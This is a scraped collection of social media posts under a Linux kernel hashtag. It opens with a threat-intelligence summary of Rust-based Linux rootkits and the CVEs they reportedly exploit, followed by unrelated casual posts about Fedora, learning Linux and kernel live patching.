aligns more closely with advanced intrusion frameworks or red-teaming tools rather than more generic Linux malware. As it actively checks for cloud agents and monitoring tools in cloud-hosted environments, its capabilities are tailored to operate effectively in defended networks. The advanced tradecraft illustrated indicates a high level of strategic planning by threat actors seeking prolonged access and control over targeted systems.

#threatreport #MediumCompleteness Snake Rustamania | 02-12-2025 Source: rt-solar.ru/solar-4rays/blog… Key details below ↓ 🧑‍💻Actors/Campaigns: Shedding_zmiy Overload 💀Threats: Kitsune, Octopus, Leech, Pwnkit_tool, Bulldog_backdoor, 🔓CVEs: CVE-2023-4911 \[[Vulners](vulners.com/cve/CVE-2023-491…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - gnu glibc (<2.39) CVE-2022-2588 \[[Vulners](vulners.com/cve/CVE-2022-258…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<4.9.326, <4.14.291, <4.19.256, <5.4.211, <5.10.137) CVE-2021-3156 \[[Vulners](vulners.com/cve/CVE-2021-315…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - sudo_project sudo (<1.8.32, <1.9.5) CVE-2021-4034 \[[Vulners](vulners.com/cve/CVE-2021-403…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - polkit_project polkit (<121) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🧨IOCs: - File: 4 - Hash: 11 💽Software: Telegram, Linux, Mycelium, selinux, Debian, Ubuntu, nginx, sudo, mariadb, unix, ... 🔢Algorithms: sha1, sha256, crc-32, xor, base64, md5 🔠Functions: sentmsg, getMyceliumProxyConn 📜Programming Languages: php, ruby, perl, python, rust #threatreport: In March 2023, an article highlighted the emergence of new tools under the name Shedding Zmiy, which unveiled the Puma and Kitsune rootkits along with various other utilities developed in Rust. These tools are designed to assist attackers in establishing initial access to systems and maintaining persistence post-exploit. The article delves into the techniques employed by these Rust-based malware components, emphasizing their operational interplay. The sophisticated nature of their design allows for enhanced stealth and effectiveness during cyber attacks. The technical interactions between Puma and Kitsune, as well as the additional utilities, showcase the potential for these tools to be leveraged by threat actors to navigate and manipulate targeted environments successfully. The increasing use of Rust indicates a shift towards languages that enable the creation of efficient and low-level system utilities, suggesting a trend in the evolution of malware development practices. Such advancements pose significant risks, as the combination of these rootkits and associated tools can enable attackers to circumvent traditional security measures, gaining deeper and more lasting access to compromised systems. The technical assessment of these malware types highlights the necessity for ongoing vigilance and adaptation in cybersecurity strategies to address the growing sophistication of cyber threats.

Epicさんアカウント関連のAPIのOSにlinux_kernelの2.6.18を使ってる模様 ローカルユーザがRoot権限取れるあれが残ってるならまずいと思うんですけどどうなんだろうか

Fedora 43: HUGE Changes Coming & What to Expect in 2025! youtu.be/TIShNC0TFWQ?si=UZ5p… via @YouTube #OpenSource #LinuxJobs #linuxcontainers #linux_kernel #9to5linux #9to5linuxofficial @fedora #Fedora #RedHat @RedHat #linux

GOING LINUX MODE🐧 I used to think Linux was some cheap copy of windows because of its logo in 10th.😭(i regret it , ill kill the past me). Yeah ik ubuntu is for kids ill reach arch in a month or 2 maybe 💀 (running it on WSL) #linux_kernel #Ubuntu

Und beim #Linux_Kernel: "In der #hypervernetzten Welt von heute sind #Systemausfälle [...] eine #geschäftliche #Katastrophe. Linux-Kernel-Live-Patching ist eine Möglichkeit, #kritische und wichtige #Sicherheitspatches auf einen laufenden #LinuxKernel anzuwenden"